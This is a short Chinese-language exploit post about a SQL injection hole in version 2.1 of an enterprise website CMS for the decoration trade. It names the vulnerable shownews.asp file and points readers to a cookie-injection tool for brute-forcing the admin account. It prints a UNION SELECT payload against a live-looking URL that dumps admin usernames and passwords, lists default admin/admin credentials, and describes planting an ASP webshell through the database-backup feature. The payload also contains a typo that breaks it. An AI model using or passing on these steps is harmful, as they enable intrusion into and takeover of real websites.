汇成装潢行业企业网站系统vII2.1注入漏洞利用

产品介绍： 拥有企业网站常用的模块功能：企业简介模块、联系我们模块、新闻(文章)模块、产品 模块、图片模块、招聘模块、在线留言、反馈系统、在线交流、友情链接、网站地图、 栏目管理、网站碎片、管理员与权限管理等等，所有模块的分类均支持无限级别的分类 ，可拓展性非常强大。其中包括万能的栏目管理系统、网站碎片管理系统，通过这些系 统，可以组合出各种不同的页面和应用。系统带强大灵活的后台管理功能、支持伪静态 URL页面功能、自定义Banner、LOGO功能等可为企业打造出大气漂亮且具有营销力的公 司网站。

 

漏洞文件：shownews.asp

使用穿山甲cookie注入工具 爆破管理用户名

工具下载地址http://dl.dbank.com/c003djyivh e

xp：http://www.hackqing.com/shownews.asp?id=338 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin

演示地址：http://www.shengmake.net/ceshi/zhuanghuang/

默认后台：/admin user:admin pass:admin 后台拿shell非常简单，有数据库备份，图片马备份为asp就ok了，最后路径复制asp的